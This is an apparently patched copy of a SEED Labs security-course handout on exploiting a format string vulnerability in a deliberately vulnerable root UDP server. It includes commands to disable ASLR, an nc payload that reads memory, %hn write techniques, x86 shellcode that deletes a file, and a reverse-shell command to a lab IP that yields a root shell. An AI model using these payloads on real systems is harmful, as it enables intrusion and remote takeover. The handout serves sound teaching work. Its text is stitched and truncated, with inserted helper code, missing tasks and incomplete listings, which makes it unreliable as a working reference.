Attachment 1
1 Overview
The printf() function in C prints out a string according to a format. Its first argument is called the
format string, which defines how the output should be formatted. Format strings use placeholders marked
by the % character, which printf() fills in with data during printing. Format strings are not limited
to the printf() function; many other functions, such as sprintf(), fprintf(),
and scanf(), also use them. Some programs allow users to provide all or part of the
contents of a format string. If such contents are not sanitized, malicious users can use this opportunity to get
the program to run arbitrary code. A problem like this is called a format string vulnerability.
The objective of this lab is for students to gain first-hand experience with format string vulnerabilities
by putting what they have learned about the vulnerability in class into action. Students will be given a
program with a format string vulnerability; their task is to exploit the vulnerability to achieve the following
damage: (1) crash the program, (2) read the internal memory of the program, (3) modify the internal
memory of the program, and most severely, (4) inject and execute malicious code using the victim program’s
privilege. This lab covers the following topics:
Customization by instructor. Instructors should customize this lab by choosing a value for the
DUMMY_SIZE constant, which is used during the compilation of the vulnerable program. Different
values can make the solutions different. Please pick a value between 0 and 300 for this lab.
Readings and videos. Detailed coverage of the format string attack can be found in the following:
• Chapter 6 of the SEED Book, Computer & Internet Security: A Hands-on Approach, 2nd Edition, by
Wenliang Du. See details at https://www.handsonsecurity.net.
• Section 9 of the SEED Lecture at Udemy, Computer Security: A Hands-on Approach, by Wenliang
Du. See details at https://www.handsonsecurity.net/video.html.
• The lab also involves reverse shell, which is covered in Chapter 9 of the SEED book.
Lab environment. This lab has been tested on our pre-built Ubuntu 16.04 VM, which can be downloaded
from the SEED website.
SEED Labs – Format String Vulnerability Lab 2
2 Lab Tasks
To simplify the tasks in this lab, we turn off the address randomization using the following command:
$ sudo sysctl -w kernel.randomize_va_space=0
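To confirm that the setting took effect, the value can be read back from /proc. The following is a minimal
sketch, assuming a Linux system; the helper names read_aslr_mode and describe_aslr_mode are hypothetical,
and the value descriptions follow the Linux kernel's sysctl documentation.

```python
from pathlib import Path

# Kernel file that mirrors the kernel.randomize_va_space sysctl.
ASLR_PATH = "/proc/sys/kernel/randomize_va_space"

# Meaning of each value, as described in the kernel sysctl documentation.
ASLR_MODES = {
    0: "disabled",
    1: "partial (stack, mmap base, shared libraries)",
    2: "full (also randomizes the heap)",
}

def read_aslr_mode(path: str = ASLR_PATH) -> int:
    """Return the integer currently stored in the ASLR setting file."""
    return int(Path(path).read_text().strip())

def describe_aslr_mode(mode: int) -> str:
    """Translate the numeric setting into a short description."""
    return ASLR_MODES.get(mode, "unknown value")

# Typical use on the lab VM (not executed here):
#   print(describe_aslr_mode(read_aslr_mode()))
```

For this lab, the value read back should be 0 after running the sysctl command.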
Listing 1: The vulnerable server program server.c (can be downloaded from the lab’s website)
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/ip.h>
void main()
{
    struct sockaddr_in server;
    struct sockaddr_in client;
    int clientLen;
    char buf[1500];

    helper();

    while (1) {
        bzero(buf, 1500);
        recvfrom(sock, buf, 1500-1, 0,
                 (struct sockaddr *) &client, &clientLen);
        myprintf(buf);
    }
    close(sock);
}
Compilation. Compile the above program. You will receive a warning message. This warning message
is a countermeasure implemented by the gcc compiler against format string vulnerabilities. We can ignore
this warning message for now.
// Note: N should be replaced by the value set by the instructor
$ gcc -DDUMMY_SIZE=N -z execstack -o server server.c
server.c: In function ’myprintf’:
server.c:13:5: warning: format not a string literal and no format arguments [-Wformat-security]
    printf(msg);
    ^
It should be noted that the program needs to be compiled with the "-z execstack" option, which
allows the stack to be executable. This option has no impact on Tasks 1 to 5, but it is important for
Tasks 6 and 7. In these two tasks, we need to inject malicious code into the server program’s stack space; if
the stack is not executable, Tasks 6 and 7 will fail. A non-executable stack is a countermeasure against
stack-based code injection attacks, but it can be defeated using the return-to-libc technique. To simplify
this lab, we disable this defeatable countermeasure.
For instructors. To prevent students from using solutions from the past (or those posted on the
Internet), instructors can change the value of DUMMY_SIZE by requiring students to compile the server
code using a different DUMMY_SIZE value. Without the -DDUMMY_SIZE option, DUMMY_SIZE is set to
the default value 100 (defined in the program). When this value changes, the layout of the stack changes,
and the solution will be different. Students should ask their instructors for the value of N.
Running and testing the server. The ideal setup for this lab is to run the server on one VM and
launch the attack from another VM. However, it is acceptable for students to use a single VM. On the
server VM, we run the server program with root privilege; we assume that this program is a privileged
root daemon. The server listens on port 9090. On the client VM, we can send data to the server using the
nc command, where the "-u" flag means UDP (the server program is a UDP server). The IP address in
the following example should be replaced by the actual IP address of the server VM, or 127.0.0.1 if the
client and server run on the same VM.
// On the server VM
$ sudo ./server
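The client side can also be scripted instead of typed into nc. The following is a minimal sketch, assuming
Python 3 is available on the client VM; the helper name send_udp is hypothetical, and the default host
127.0.0.1 assumes that the client and the server run on the same VM.

```python
import socket

def send_udp(payload: bytes, host: str = "127.0.0.1", port: int = 9090) -> int:
    """Send one UDP datagram to the server and return the number of bytes sent."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        return sock.sendto(payload, (host, port))

# Typical use against the lab server (not executed here):
#   send_udp(b"hello\n")
```

Because the payload is a bytes object, the same helper can later carry input that contains binary data.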
You can send any data to the server. The server program is supposed to print out whatever you send.
However, a format string vulnerability exists in the server program’s myprintf() function, which allows
us to get the server program to do more than what it is supposed to do, including giving us root access to
the server machine. In the rest of this lab, we are going to exploit this vulnerability.
• Question 1: What are the memory addresses at the locations marked by ➊, ➋, and ➌?
                     Higher Address
                +----------------------+
                |       . . . .        |
   main()       |      buf[1500]       | <-- ➌  Input provided by remote users
                |                      |        will be stored here.
                |       . . . .        |
                |         msg          |
   myprintf()   |    Return Address    | <-- ➋
                |       . . . .        |
                |    format string     | <-- ➊
   printf()     |    Return Address    |
                |       . . . .        |
                +----------------------+
                     Lower Address
Figure 1: The stack layout when printf() is invoked from inside of the myprintf() function.
• Task 4.A: Stack Data. The goal is to print out the data on the stack (any data is fine). How many
format specifiers do you need to provide so you can get the server program to print out the first four
bytes of your input via a %x?
• Task 4.B: Heap Data. There is a secret message stored in the heap area, and you know its address;
your job is to print out the content of the secret message. To achieve this goal, you need to place
the address (in binary form) of the secret message in your input (i.e., the format string), but it is
difficult to type binary data inside a terminal. We can use the following command to do that.
$ echo $(printf "\x04\xF3\xFF\xBF")%.8x%.8x | nc -u 10.0.2.5 9090
It should be noted that most computers are little-endian machines, so to store an address 0xAABBCCDD
(four bytes on a 32-bit machine) in memory, the least significant byte 0xDD is stored at the lower
address, while the most significant byte 0xAA is stored at the higher address. Therefore, when we store
the address in a buffer, we need to save it in this order: 0xDD, 0xCC, 0xBB, and then 0xAA.
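The byte order can be checked in Python before building any input. The following is a minimal sketch;
the helper name pack_address is hypothetical, and 0xBFFFF304 is simply the address spelled out by the
bytes in the echo command above, not an address to expect on your VM.

```python
import struct

def pack_address(addr: int) -> bytes:
    """Encode a 32-bit address as 4 bytes, least significant byte first."""
    return struct.pack("<I", addr)

# 0xAABBCCDD is laid out in memory as DD CC BB AA.
assert pack_address(0xAABBCCDD) == b"\xdd\xcc\xbb\xaa"

# These are the same bytes that printf "\x04\xF3\xFF\xBF" produces in the shell.
assert pack_address(0xBFFFF304) == b"\x04\xf3\xff\xbf"

# int.to_bytes() is an equivalent way to get the same encoding.
assert (0xBFFFF304).to_bytes(4, byteorder="little") == pack_address(0xBFFFF304)
```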
Python code. Because the format string that we need to construct may be quite long, it is more convenient
to write a Python program to do the construction. The following sample code shows how to construct a
string that contains binary numbers.
Listing 2: Sample code build_string.py (can be downloaded from the lab’s website)
#!/usr/bin/python3
import sys
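The following is a minimal sketch of this kind of construction. It is not the lab's build_string.py
itself: the function names, the output file name badfile, the address, and the number of %.8x
specifiers are placeholder assumptions that you would replace with values found on your own VM.

```python
def build_payload(address: int, num_specifiers: int, final: str = "%s") -> bytes:
    """Return a 4-byte little-endian address followed by the format text."""
    head = address.to_bytes(4, byteorder="little")   # binary address
    fmt = "%.8x" * num_specifiers + final            # printable part
    return head + fmt.encode("latin-1")

def write_payload(payload: bytes, filename: str = "badfile") -> None:
    """Save the payload so that it can be sent to the server later."""
    with open(filename, "wb") as f:
        f.write(payload)

# Example with placeholder values (not executed here):
#   write_payload(build_payload(0xBFFFF304, 2))
```

The resulting file can then be sent with nc, for example nc -u 127.0.0.1 9090 < badfile.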
• Task 5.A: Change the value to a different value. In this sub-task, we need to change the content of
the target variable to something else. Your task is considered as a success if you can change it to a
different value, regardless of what value it may be.
• Task 5.B: Change the value to 0x500. In this sub-task, we need to change the content of the
target variable to a specific value 0x500. Your task is considered as a success only if the variable’s
value becomes 0x500.
• Task 5.C: Change the value to 0xFF990000. This sub-task is similar to the previous one, except
that the target value is now a large number. In a format string attack, this value is the total number of
characters that are printed out by the printf() function; printing out this large number of characters
may take hours. You need to use a faster approach. The basic idea is to use %hn, instead of %n, so
we can modify a two-byte memory space, instead of four bytes. Printing out 2^16 characters does not
take much time. We can break the memory space of the target variable into two blocks of memory,
each having two bytes. We just need to set one block to 0xFF99 and set the other one to 0x0000.
This means that in your attack, you need to provide two addresses in the format string.
In format string attacks, changing the content of a memory space to a very small value is quite
challenging (please explain why in the report); 0x00 is an extreme case. To achieve this goal, we need to
use an overflow technique. The basic idea is that when we make a number larger than what the storage
allows, only the lower part of the number will be stored (basically, there is an integer overflow). For
example, if the number 2^16 + 5 is stored in a 16-bit memory space, only 5 will be stored. Therefore,
to get to zero, we just need to get the number to 2^16 = 65,536.
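The overflow arithmetic can be checked with a few lines of Python. This is a sketch under stated
assumptions: the helper name hn_paddings and the starting count of 12 already-printed characters are
hypothetical, and the real count depends on what your format string prints before the first %hn.

```python
def hn_paddings(already_printed: int, targets):
    """
    For each 16-bit target value, in the order its %hn appears, return how
    many extra characters must be printed before that %hn. The running count
    only grows, so a smaller target is reached by wrapping past 2**16,
    because %hn stores only the low 16 bits of the count.
    """
    paddings = []
    count = already_printed
    for value in targets:
        extra = (value - count) % 0x10000
        paddings.append(extra)
        count += extra
    return paddings

# Only the low 16 bits survive a 16-bit store: 2^16 + 5 becomes 5.
assert (2**16 + 5) & 0xFFFF == 5

# Writing 0xFF99 first and 0x0000 second, starting from 12 printed characters:
assert hn_paddings(12, [0xFF99, 0x0000]) == [65421, 103]
```

In the example, the second write needs only 103 more characters because 65,433 + 103 = 65,536, whose
low 16 bits are zero. Each padding would typically be supplied as a field width, which has an effect
only if it is at least as large as the natural printed width of the corresponding argument.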
We need to execute the above shellcode command using the execve() system call, which means
feeding the following arguments to execve():
execve(address to the "/bin/bash" string, address to argv[], 0),
where argv[0] = address of the "/bin/bash" string,
argv[1] = address of the "-c" string,
argv[2] = address of the "/bin/rm /tmp/myfile" string,
argv[3] = 0
We need to write the machine code to invoke the execve() system call, which involves setting the
following four registers before invoking the "int 0x80" instruction.
eax = 0x0B (execve()’s system call number)
ebx = address of the "/bin/bash" string (argument 1)
ecx = address of argv[] (argument 2)
edx = 0 (argument 3, for environment variables; we set it to NULL)
Setting these four registers in shellcode is quite challenging, mostly because the code cannot contain
any zero byte (a zero in a string terminates the string). We provide the shellcode below. A detailed
explanation of shellcode can be found in the Buffer-Overflow Lab and in Chapter 4.7 of the SEED book
(2nd edition).
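The zero-byte restriction is easy to test mechanically. The following is a minimal sketch; the helper
name null_offsets is hypothetical, and the two byte sequences are standard 32-bit x86 encodings chosen
for illustration rather than taken from the lab's files.

```python
def null_offsets(code: bytes):
    """Return the offsets of all zero bytes in a piece of machine code."""
    return [i for i, b in enumerate(code) if b == 0]

# movl $0x0b, %eax stores the constant as a 32-bit immediate: three zero bytes.
naive = b"\xb8\x0b\x00\x00\x00"

# xorl %eax, %eax followed by movb $0x0b, %al sets the same value without zeros.
zero_free = b"\x31\xc0\xb0\x0b"

assert null_offsets(naive) == [2, 3, 4]
assert null_offsets(zero_free) == []
```

Running such a check on your final shellcode before sending it can save debugging time, since a zero
byte would cut the input short wherever it is treated as a string.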
Listing 3: Shellcode in server_exploit_skeleton.py (can be downloaded from the lab’s website)
# The following code runs "/bin/bash -c '/bin/rm /tmp/myfile'"
malicious_code= (
    # Push the command '/bin////bash' into stack (//// is equivalent to /)
    "\x31\xc0"                 # xorl %eax,%eax
    "\x50"                     # pushl %eax
    "\x68""bash"               # pushl "bash"
    "\x68""////"               # pushl "////"
    "\x68""/bin"               # pushl "/bin"
    "\x89\xe3"                 # movl %esp, %ebx
    # Push the 1st argument '-ccc' into stack (-ccc is equivalent to -c)

    # Set edx to 0
    "\x31\xd2"                 # xorl %edx,%edx
You need to pay attention to the code between Lines ➀ and ➁. This is where we push the /bin/rm
command string onto the stack. In this task, you do not need to modify this part, but for the next task, you
do need to modify it. The pushl instruction can only push a 32-bit integer onto the stack; that is why we
break the string into several 4-byte blocks. Since this is a shell command, adding extra spaces does not
change the meaning of the command; therefore, if the length of the string is not a multiple of four, you
can always pad it with spaces. The stack grows from high address to low address, so we
need to push the string in reverse order, last block first.
In the shellcode, when we store "/bin/bash" on the stack, we store "/bin////bash", which
has a length of 12, a multiple of 4. The additional "/" characters are ignored by execve(). Similarly, when
we store "-c" on the stack, we store "-ccc", increasing the length to 4. For bash, those additional c’s are
redundant.
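Splitting a command into 4-byte blocks by hand is error-prone, so it can help to generate the blocks.
The following is a minimal sketch; the helper names push_chunks and push_bytes are hypothetical. It pads
with spaces, which is appropriate for a shell command, and emits only the pushl instructions (opcode
0x68, as in the listing). The terminating zero still has to be pushed separately, as the listing does
with pushl %eax before pushing "bash".

```python
def push_chunks(command: str, pad: str = " "):
    """Pad the command to a multiple of 4 and return its blocks, last block first."""
    padded_len = -(-len(command) // 4) * 4          # round up to a multiple of 4
    padded = command.ljust(padded_len, pad)
    blocks = [padded[i:i + 4] for i in range(0, len(padded), 4)]
    return blocks[::-1]                             # reverse order for the stack

def push_bytes(command: str) -> bytes:
    """Return the machine code of the pushl instructions for the command."""
    return b"".join(b"\x68" + blk.encode("latin-1") for blk in push_chunks(command))

# The 19-character command gets one trailing space and becomes five blocks.
assert push_chunks("/bin/rm /tmp/myfile") == ["ile ", "/myf", "/tmp", "/rm ", "/bin"]
```

The first block in the returned list is the one to push first, so that the start of the string ends
up at the lowest address.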
Please construct your input, feed it to the server program, and demonstrate that you can successfully
remove the target file. In your lab report, you need to explain how your format string is constructed. Please
mark on Figure 1 where your malicious code is stored (please provide the concrete address).
You need to modify the shellcode listed in Listing 3, so instead of running the /bin/rm command
using bash, your shellcode runs the following command. The example assumes that the attacker machine’s
IP address is 10.0.2.6, so you need to change the IP address in your code:
/bin/bash -c "/bin/bash -i > /dev/tcp/10.0.2.6/7070 0<&1 2>&1"
You only need to modify the code between Lines ➀ and ➁, so that the above "/bin/bash -i ..."
command is executed by the shellcode instead of the /bin/rm command. Once you finish the shellcode,
you should construct your format string and send it to the victim server as input. If your attack is
successful, your TCP server should get a callback, and you will get a root shell on the victim machine.
Please provide evidence of success in your report (including screenshots).
3 Submission
You need to submit a detailed lab report, with screenshots, to describe what you have done and what you
have observed. You also need to explain the observations that are interesting or surprising.
Please also list the important code snippets, followed by explanations. Simply attaching code without any
explanation will not receive credit.